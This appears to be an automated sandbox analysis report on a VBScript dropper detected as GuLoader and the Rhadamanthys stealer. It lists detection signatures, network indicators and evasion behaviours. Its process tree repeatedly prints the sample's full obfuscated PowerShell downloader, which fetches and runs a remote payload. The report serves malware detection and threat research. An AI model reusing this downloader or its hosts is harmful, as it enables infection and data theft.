Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0iTxQouy7k.vbs

Overview

General Information

Sample name:0iTxQouy7k.vbs
renamed because original name is a hash value
Original sample name:9e929d364735ee271f20222e8c465068a13777e32424a12d9b175da63d422f3a.vbs
Analysis ID:1578226
MD5:3641d1c1daf325ca23298e285dc44693
SHA1:ac8cd1a18de887698bdd2301fccfcff0202bbcb0
SHA256:9e929d364735ee271f20222e8c465068a13777e32424a12d9b175da63d422f3a
Tags:185-236-228-9287-120-112-91GuLoadervbswww-al-rasikh-comuser-JAMESWT_MHT
Infos:

Detection

GuLoader, RHADAMANTHYS
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7140 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0iTxQouy7k.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WMIC.exe (PID: 5812 cmdline: wmic diskdrive get caption,serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 3568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5752 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Anhemitonic63='Unclever';;$Brescian='debauchedly';;$thunderhead='Reservationsdatoers';;$Graadens='Dogernes';;$Eksplosionsmotorernes47=$host.Name; function Resubmerging($Dagsproduktionernestjeneste){If ($Eksplosionsmotorernes47) {$Satirizers='Flippermaskiners';$Heterogenes=2;$Dagsproduktionerne=$Heterogenes}do{$laboratorieplanlgningers+=$Dagsproduktionernestjeneste[$Dagsproduktionerne];$Dagsproduktionerne+=3} until(!$Dagsproduktionernestjeneste[$Dagsproduktionerne])$laboratorieplanlgningers}function Impalement($Lucern179){ .($Raaderet113) ($Lucern179)}$Aabningshaand=Resubmerging 'Sun,reSlTSy. rw';$Aabningshaand+=Resubmerging 'BeE.lBSyCSpLKai CeShn t';$Stikkelsbrbens127=Resubmerging 'FoMAmoEtzOriFyl Pl DaRe/';$Telemetered=Resubmerging 'AtT SlGus s1 I2';$Dagsproduktionernendows='Pl[AcnP EOrtEu.Nos ae,mrUavS,iS c pEMaPS o yiDon DtB M a cn.jaMaGUnEJerlo]Ca: :SkS eeTacBlU urPiiBit AYBep ORInoM TEloTaCFao.nl B=Sc$IntMie LReeTemKuEViTP.eUdrLiEK D';$Stikkelsbrbens127+=Resubmerging 'S 5 r.,a0Sn Pe(F W MiannArdDioVswRes BeNApTA Pl1 r0Ra. e0Li; o CrWJeiUnnDi6Ne4Fo;fo PixRe6F 4R ; D F rBuv h:Lk1Hi3 T1 u.Ep0 H) S StG EeRac.ekBuo T/ 2 G0Op1 .0Fe0Sc1 O0Sq1Ne BlF Pi UrFoe fAnoAlxFr/,r1 .3B,1.i. S0';$Centas=Resubmerging ',oU s SE CrSc- Ma g deHyN UT';$morbidise=Resubmerging 'Ovh ntU tTipTrsDr:Ra/Ou/ ,w Sw NwFi. ttC dUne BjDibta.Kic so .m v/SukPopEl/HaE kpPei.il ea rc lhCrnSwa.t. ,qMuxEfdPu>.ah Pt Bttrprns a:Co/Sv/ Lw dwK.wS . fUdt AsG ePrnGigT iMon leMeeHorV sCa. BcUfoBrm T/KakScmWo/ OENepAuiJalHaaRicfihHonLeaAk.OlqMux Cd';$Dixenite=Resubmerging 'Sc>';$Raaderet113=Resubmerging ' ,I ePaX';$Feminologisk='Bestrr';$klerum='\Enspndervognes.Eks';Impalement (Resubmerging ' K$ sgN lIno bgiAPrl C:UnrA a ,bOvAD lGedRveRerReMTed RE.e=O,$ le ,N FV C: BAScp .pQudLraFoTprASk+b.$SpKFeLU E nRLauSeM');Impalement (Resubmerging ' S$ GC.lKoO pbUcAS lO,:DiGLaAilsMatVaR OO gm ,E nNvitoAVi=Ta$FoMO oEurUrb BIRedSpi Ssane p.PrsInP el PiSktKo( d$b d FI oXInE enC IGgTUdEUn)');Impalement (Resubmerging $Dagsproduktionernendows);$morbidise=$gastromenia[0];$Parfumens=(Resubmerging 'Lr$moG KlBiO ebUgaFiL P:P dHyEHeC ,AIlL lCScIskf DyDiIBrnNeG =LaN DEMaW -Jeo HBssJ Ce FCflTRa uSS.Yp StatUneFuMKr.H $ UAN aScbNonA.I JNH gYosN H eAL ASknT D');Impalement ($Parfumens);Impalement (Resubmerging 'C $ ADDee jc yaS,lVecT,iK.fk,y BiDdntig p.TrHaneUnaS.dH e Rr usIm[ D$ SC .e SnUntM,a.es G]I,=Bl$prSTotPaiPikvikN,e UlTrsEkbArrSvb ieCun s A1Ud2 a7');$Nonappreciative=Resubmerging 'Im$KaDPie .cFia .lIncGui,nf .yUkiAsn g.d. SD o.lwEunSulUno RaP dUlFC iInlEfeTi(Ty$ ,m EovarKabEniBrdCaisasileFl,Fr$S.S ooJak TlT e.ptAnt feUnnAn7K,6 O)';$Sokletten76=$Rabaldermde;Impalement (Resubmerging ',e$T gliL vOMaB BAAplUm: S ,T vOReS ,NTuI.xN.uG e rnL,s e=.a(PaTSneL.SsttTr-GePUra,eTCoHE D $KySMaO Hk .LIbEd tChT SEV,nra7Re6Va)');while (!$Stosningens) {Impalement (Resubmerging 'Mu$EpgShlHuovabHyaCol :B.Mmuo Rn ra NrP.k i,usM.tA.iB s.nkLee r=F $NaO pK tL jS.e nKii vnSugInsPaaO a r') ;Impalement $Nonappreciative;Impalement (Resubmerging 'UnsSctUnAtoRAaTC -Sas NLKreNoECapTe C4');Impalement (Resubmerging ' F$OvgS.lNoo lBPaaA lT,:RosUnTInoO.s,rnbeiRenAggemE ,N .S e=Te(unt EeceSInTKe-ChPArASaT Sh K M $T sOvOprk l.vESkTSkTC EAnnTo7 V6La)') ;Impalement (Resubmerging 'Le$a GE lSeONdB a,tL k:GooPrU rt,uTBeiBer PismN DgRe=Lo$.mg rlS,oSoB raSuLVe:StM e RDrcVih taIbNKoDSkr TYAt+ a+,e% A$TegC.a S et Mrfuo yMR EgrN KI aHa..ncCeoInuReNSkt') ;$morbidise=$gastromenia[$Outtiring]}$Bortfaldes50=318066;$Rulle=26987;Impalement (Resubmerging 'fe$ ,g l Mo Ub ,AanLPa:E.tbeES,NPeUNiTVeODysAn .b= .ig SE TtTo-a CL,OOiNSct.eEManMeT o Li$DesBrOKikP LCrEKat HtInEKeNCh7M,6');Impalement (Resubmerging 'H $TagStl PoFibCoa.bltu: tRWieBnaKal MkFirFoeExdToiAatWo Di=Ex O,[UnSG y UsC tR eApmSc.InCS o unB vFoeGlrT,tPi]We:Pr:BeF Kr.eoD m mB Ha TsS eSk6 S4 TSVetInrviiAfnAugSi(M,$EsTKoeS.n PuLatLaoG sCo)');Impalement (Resubmerging ' E$ nGMclP,OC.bHoALilPo:AnpHeRPoOVig KRPlATrMApUInDH,f ,R lESoLU.SB E N P= n i[S SJuYstsUnT eE oMC,.SuTPeeChX vTSk.HaeInNH,cbeoKadCoiPlNGoGVe]I.:Ny: mA.psL CEmIBii r. sG eTitK sg.T yRh I N gRe(By$MaR.oeQuA iL mKDerUnesaD Ri rT s)');Impalement (Resubmerging 'Ik$UdG Sl OoFoB eA,klHa:I,nAgODinFoGSiaE.sHeShyYFa=Bl$BupMorGuo .gPur SaKomT.U,aDS.fFlRBaelgLAmSS eJondo.m S .uDibPaSVeT r iiM nVegbu(Mo$Wobreo DrPrtBofP.A SLFrdC eTysye5Fo0Mi,De$,urRdUs L TLScE.r)');Impalement $Nongassy;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 4948 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Anhemitonic63='Unclever';;$Brescian='debauchedly';;$thunderhead='Reservationsdatoers';;$Graadens='Dogernes';;$Eksplosionsmotorernes47=$host.Name; function Resubmerging($Dagsproduktionernestjeneste){If ($Eksplosionsmotorernes47) {$Satirizers='Flippermaskiners';$Heterogenes=2;$Dagsproduktionerne=$Heterogenes}do{$laboratorieplanlgningers+=$Dagsproduktionernestjeneste[$Dagsproduktionerne];$Dagsproduktionerne+=3} until(!$Dagsproduktionernestjeneste[$Dagsproduktionerne])$laboratorieplanlgningers}function Impalement($Lucern179){ .($Raaderet113) ($Lucern179)}$Aabningshaand=Resubmerging 'Sun,reSlTSy. rw';$Aabningshaand+=Resubmerging 'BeE.lBSyCSpLKai CeShn t';$Stikkelsbrbens127=Resubmerging 'FoMAmoEtzOriFyl Pl DaRe/';$Telemetered=Resubmerging 'AtT SlGus s1 I2';$Dagsproduktionernendows='Pl[AcnP EOrtEu.Nos ae,mrUavS,iS c pEMaPS o yiDon DtB M a cn.jaMaGUnEJerlo]Ca: :SkS eeTacBlU urPiiBit AYBep ORInoM TEloTaCFao.nl B=Sc$IntMie LReeTemKuEViTP.eUdrLiEK D';$Stikkelsbrbens127+=Resubmerging 'S 5 r.,a0Sn Pe(F W MiannArdDioVswRes BeNApTA Pl1 r0Ra. e0Li; o CrWJeiUnnDi6Ne4Fo;fo PixRe6F 4R ; D F rBuv h:Lk1Hi3 T1 u.Ep0 H) S StG EeRac.ekBuo T/ 2 G0Op1 .0Fe0Sc1 O0Sq1Ne BlF Pi UrFoe fAnoAlxFr/,r1 .3B,1.i. S0';$Centas=Resubmerging ',oU s SE CrSc- Ma g deHyN UT';$morbidise=Resubmerging 'Ovh ntU tTipTrsDr:Ra/Ou/ ,w Sw NwFi. ttC dUne BjDibta.Kic so .m v/SukPopEl/HaE kpPei.il ea rc lhCrnSwa.t. ,qMuxEfdPu>.ah Pt Bttrprns a:Co/Sv/ Lw dwK.wS . fUdt AsG ePrnGigT iMon leMeeHorV sCa. BcUfoBrm T/KakScmWo/ OENepAuiJalHaaRicfihHonLeaAk.OlqMux Cd';$Dixenite=Resubmerging 'Sc>';$Raaderet113=Resubmerging ' ,I ePaX';$Feminologisk='Bestrr';$klerum='\Enspndervognes.Eks';Impalement (Resubmerging ' K$ sgN lIno bgiAPrl C:UnrA a ,bOvAD lGedRveRerReMTed RE.e=O,$ le ,N FV C: BAScp .pQudLraFoTprASk+b.$SpKFeLU E nRLauSeM');Impalement (Resubmerging ' S$ GC.lKoO pbUcAS lO,:DiGLaAilsMatVaR OO gm ,E nNvitoAVi=Ta$FoMO oEurUrb BIRedSpi Ssane p.PrsInP el PiSktKo( d$b d FI oXInE enC IGgTUdEUn)');Impalement (Resubmerging $Dagsproduktionernendows);$morbidise=$gastromenia[0];$Parfumens=(Resubmerging 'Lr$moG KlBiO ebUgaFiL P:P dHyEHeC ,AIlL lCScIskf DyDiIBrnNeG =LaN DEMaW -Jeo HBssJ Ce FCflTRa uSS.Yp StatUneFuMKr.H $ UAN aScbNonA.I JNH gYosN H eAL ASknT D');Impalement ($Parfumens);Impalement (Resubmerging 'C $ ADDee jc yaS,lVecT,iK.fk,y BiDdntig p.TrHaneUnaS.dH e Rr usIm[ D$ SC .e SnUntM,a.es G]I,=Bl$prSTotPaiPikvikN,e UlTrsEkbArrSvb ieCun s A1Ud2 a7');$Nonappreciative=Resubmerging 'Im$KaDPie .cFia .lIncGui,nf .yUkiAsn g.d. SD o.lwEunSulUno RaP dUlFC iInlEfeTi(Ty$ ,m EovarKabEniBrdCaisasileFl,Fr$S.S ooJak TlT e.ptAnt feUnnAn7K,6 O)';$Sokletten76=$Rabaldermde;Impalement (Resubmerging ',e$T gliL vOMaB BAAplUm: S ,T vOReS ,NTuI.xN.uG e rnL,s e=.a(PaTSneL.SsttTr-GePUra,eTCoHE D $KySMaO Hk .LIbEd tChT SEV,nra7Re6Va)');while (!$Stosningens) {Impalement (Resubmerging 'Mu$EpgShlHuovabHyaCol :B.Mmuo Rn ra NrP.k i,usM.tA.iB s.nkLee r=F $NaO pK tL jS.e nKii vnSugInsPaaO a r') ;Impalement $Nonappreciative;Impalement (Resubmerging 'UnsSctUnAtoRAaTC -Sas NLKreNoECapTe C4');Impalement (Resubmerging ' F$OvgS.lNoo lBPaaA lT,:RosUnTInoO.s,rnbeiRenAggemE ,N .S e=Te(unt EeceSInTKe-ChPArASaT Sh K M $T sOvOprk l.vESkTSkTC EAnnTo7 V6La)') ;Impalement (Resubmerging 'Le$a GE lSeONdB a,tL k:GooPrU rt,uTBeiBer PismN DgRe=Lo$.mg rlS,oSoB raSuLVe:StM e RDrcVih taIbNKoDSkr TYAt+ a+,e% A$TegC.a S et Mrfuo yMR EgrN KI aHa..ncCeoInuReNSkt') ;$morbidise=$gastromenia[$Outtiring]}$Bortfaldes50=318066;$Rulle=26987;Impalement (Resubmerging 'fe$ ,g l Mo Ub ,AanLPa:E.tbeES,NPeUNiTVeODysAn .b= .ig SE TtTo-a CL,OOiNSct.eEManMeT o Li$DesBrOKikP LCrEKat HtInEKeNCh7M,6');Impalement (Resubmerging 'H $TagStl PoFibCoa.bltu: tRWieBnaKal MkFirFoeExdToiAatWo Di=Ex O,[UnSG y UsC tR eApmSc.InCS o unB vFoeGlrT,tPi]We:Pr:BeF Kr.eoD m mB Ha TsS eSk6 S4 TSVetInrviiAfnAugSi(M,$EsTKoeS.n PuLatLaoG sCo)');Impalement (Resubmerging ' E$ nGMclP,OC.bHoALilPo:AnpHeRPoOVig KRPlATrMApUInDH,f ,R lESoLU.SB E N P= n i[S SJuYstsUnT eE oMC,.SuTPeeChX vTSk.HaeInNH,cbeoKadCoiPlNGoGVe]I.:Ny: mA.psL CEmIBii r. sG eTitK sg.T yRh I N gRe(By$MaR.oeQuA iL mKDerUnesaD Ri rT s)');Impalement (Resubmerging 'Ik$UdG Sl OoFoB eA,klHa:I,nAgODinFoGSiaE.sHeShyYFa=Bl$BupMorGuo .gPur SaKomT.U,aDS.fFlRBaelgLAmSS eJondo.m S .uDibPaSVeT r iiM nVegbu(Mo$Wobreo DrPrtBofP.A SLFrdC eTysye5Fo0Mi,De$,urRdUs L TLScE.r)');Impalement $Nongassy;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 5948 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • svchost.exe (PID: 6204 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000003.2196496080.0000000003880000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
    00000008.00000002.2135088634.0000000008CA0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      0000000A.00000003.2195588250.0000000021650000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        0000000A.00000003.2200198942.0000000021050000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
          0000000B.00000003.2199773661.0000000005A50000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            Click to see the 11 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            10.3.msiexec.exe.21870000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              11.3.svchost.exe.5830000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                10.3.msiexec.exe.21650000.6.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  11.3.svchost.exe.5a50000.7.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    10.3.msiexec.exe.21650000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 3 entries

                      Other

                      SourceRuleDescriptionAuthorStrings
                      amsi64_5752.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                        amsi32_4948.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                        • 0xbd7a:$b2: ::FromBase64String(
                        • 0xae12:$s1: -join
                        • 0x45be:$s4: +=
                        • 0x4680:$s4: +=
                        • 0x88a7:$s4: +=
                        • 0xa9c4:$s4: +=
                        • 0xacae:$s4: +=
                        • 0xadf4:$s4: +=
                        • 0x140ab:$s4: +=
                        • 0x1412b:$s4: +=
                        • 0x141f1:$s4: +=
                        • 0x14271:$s4: +=
                        • 0x14447:$s4: +=
                        • 0x144cb:$s4: +=
                        • 0xb622:$e4: Get-WmiObject
                        • 0xb811:$e4: Get-Process
                        • 0xb869:$e4: Start-Process
                        • 0x14d1c:$e4: Get-Process

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: WScript or CScript Dropper
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0iTxQouy7k.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0iTxQouy7k.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0iTxQouy7k.vbs", ProcessId: 7140, ProcessName: wscript.exe
                        Sigma detected: Msiexec Initiated Connection
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 202.71.109.228, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5948, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49738
                        Sigma detected: Uncommon Svchost Parent Process
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 5948, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 6204, ProcessName: svchost.exe
                        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0iTxQouy7k.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0iTxQouy7k.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\0iTxQouy7k.vbs", ProcessId: 7140, ProcessName: wscript.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Anhemitonic63='Unclever';;$Brescian='debauchedly';;$thunderhead='Reservationsdatoers';;$Graadens='Dogernes';;$Eksplosionsmotorernes47=$host.Name; function Resubmerging($Dagsproduktionernestjeneste){If ($Eksplosionsmotorernes47) {$Satirizers='Flippermaskiners';$Heterogenes=2;$Dagsproduktionerne=$Heterogenes}do{$laboratorieplanlgningers+=$Dagsproduktionernestjeneste[$Dagsproduktionerne];$Dagsproduktionerne+=3} until(!$Dagsproduktionernestjeneste[$Dagsproduktionerne])$laboratorieplanlgningers}function Impalement($Lucern179){ .($Raaderet113) ($Lucern179)}$Aabningshaand=Resubmerging 'Sun,reSlTSy. rw';$Aabningshaand+=Resubmerging 'BeE.lBSyCSpLKai CeShn t';$Stikkelsbrbens127=Resubmerging 'FoMAmoEtzOriFyl Pl DaRe/';$Telemetered=Resubmerging 'AtT SlGus s1 I2';$Dagsproduktionernendows='Pl[AcnP EOrtEu.Nos ae,mrUavS,iS c pEMaPS o yiDon DtB M a cn.jaMaGUnEJerlo]Ca: :SkS eeTacBlU urPiiBit AYBep ORInoM TEloTaCFao.nl B=Sc$IntMie LReeTemKuEViTP.eUdrLiEK D';$Stikkelsbrbens127+=Resubmerging 'S 5 r.,a0Sn Pe(F W MiannArdDioVswRes BeNApTA Pl1 r0Ra. e0Li; o CrWJeiUnnDi6Ne4Fo;fo PixRe6F 4R ; D F rBuv h:Lk1Hi3 T1 u.Ep0 H) S StG EeRac.ekBuo T/ 2 G0Op1 .0Fe0Sc1 O0Sq1Ne BlF Pi UrFoe fAnoAlxFr/,r1 .3B,1.i. S0';$Centas=Resubmerging ',oU s SE CrSc- Ma g deHyN UT';$morbidise=Resubmerging 'Ovh ntU tTipTrsDr:Ra/Ou/ ,w Sw NwFi. ttC dUne BjDibta.Kic so .m v/SukPopEl/HaE kpPei.il ea rc lhCrnSwa.t. ,qMuxEfdPu>.ah Pt Bttrprns a:Co/Sv/ Lw dwK.wS . fUdt AsG ePrnGigT iMon leMeeHorV sCa. BcUfoBrm T/KakScmWo/ OENepAuiJalHaaRicfihHonLeaAk.OlqMux Cd';$Dixenite=Resubmerging 'Sc>';$Raaderet113=Resubmerging ' ,I ePaX';$Feminologisk='Bestrr';$klerum='\Enspndervognes.Eks';Impalement (Resubmerging ' K$ sgN lIno bgiAPrl C:UnrA a ,bOvAD lGedRveRerReMTed RE.e=O,$ le ,N FV C: BAScp .pQudLraFoTprASk+b.$SpKFeLU E nRLauSeM');Impalement (Resubmerging ' S$ GC.lKoO pbUcAS lO,:DiGLaAilsMatVaR OO gm ,E nNvitoAVi=Ta$FoMO oEurUrb BIRedSpi Ssane p.PrsInP el PiSktKo( d$b d FI oXInE enC IGgTUdEUn)');Impalement (Resubmerging $Dagsproduktionernendows);$morbidise=$gastromenia[0];$Parfumens=(Resubmerging 'Lr$moG KlBiO ebUgaFiL P:P dHyEHeC ,AIlL lCScIskf DyDiIBrnNeG =LaN DEMaW -Jeo HBssJ Ce FCflTRa uSS.Yp StatUneFuMKr.H $ UAN aScbNonA.I JNH gYosN H eAL ASknT D');Impalement ($Parfumens);Impalement (Resubmerging 'C $ ADDee jc yaS,lVecT,iK.fk,y BiDdntig p.TrHaneUnaS.dH e Rr usIm[ D$ SC .e SnUntM,a.es G]I,=Bl$prSTotPaiPikvikN,e UlTrsEkbArrSvb ieCun s A1Ud2 a7');$Nonappreciative=Resubmerging 'Im$KaDPie .cFia .lIncGui,nf .yUkiAsn g.d. SD o.lwEunSulUno RaP dUlFC iInlEfeTi(Ty$ ,m EovarKabEniBrdCaisasileFl,Fr$S.S ooJak TlT e.ptAnt feUnnAn7K,6 O)';$Sokletten76=$Rabaldermde;Impalement (Resubmerging ',e$T gliL vOMaB BAAplUm: S ,T vOReS ,NTuI.xN.uG e rnL,s e=.a(PaTSneL.SsttTr-GePUra,eTCoHE D $KySMaO Hk .LIbEd tChT SEV,nra7Re6Va)');while (!$Stosningens) {Impalement (Resubmerging 'Mu$EpgShlHuovabHyaCol :B.Mmuo Rn ra NrP.k i,usM.tA.iB s.nkLee r=F $NaO pK tL

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-19T12:48:02.247816+010028032702Potentially Bad Traffic192.168.2.449738202.71.109.228443TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Multi AV Scanner detection for submitted file
                        Source: 0iTxQouy7k.vbsVirustotal: Detection: 16%Perma Link
                        Source: 0iTxQouy7k.vbsReversingLabs: Detection: 28%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
                        Source: unknownHTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.4:49731 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.4:49738 version: TLS 1.2
                        Source: Binary string: wkernel32.pdb source: msiexec.exe, 0000000A.00000003.2194982478.0000000021650000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdb source: msiexec.exe, 0000000A.00000003.2195588250.0000000021650000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2195813778.0000000021870000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 0000000A.00000003.2194490659.0000000021650000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: System.Core.pdb source: powershell.exe, 00000008.00000002.2132386041.0000000008750000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdb source: msiexec.exe, 0000000A.00000003.2194490659.0000000021650000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdbUGP source: msiexec.exe, 0000000A.00000003.2195588250.0000000021650000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2195813778.0000000021870000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wkernel32.pdbUGP source: msiexec.exe, 0000000A.00000003.2194982478.0000000021650000.00000004.00000001.00020000.00000000.sdmp

                        Software Vulnerabilities

                        barindex
                        Suspicious execution chain found
                        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                        Networking

                        barindex
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 45.149.241.141 2023Jump to behavior
                        Source: global trafficTCP traffic: 192.168.2.4:49739 -> 45.149.241.141:2023
                        Source: Joe Sandbox ViewIP Address: 45.149.241.141 45.149.241.141
                        Source: Joe Sandbox ViewIP Address: 202.71.109.228 202.71.109.228
                        Source: Joe Sandbox ViewASN Name: UUNETUS UUNETUS
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
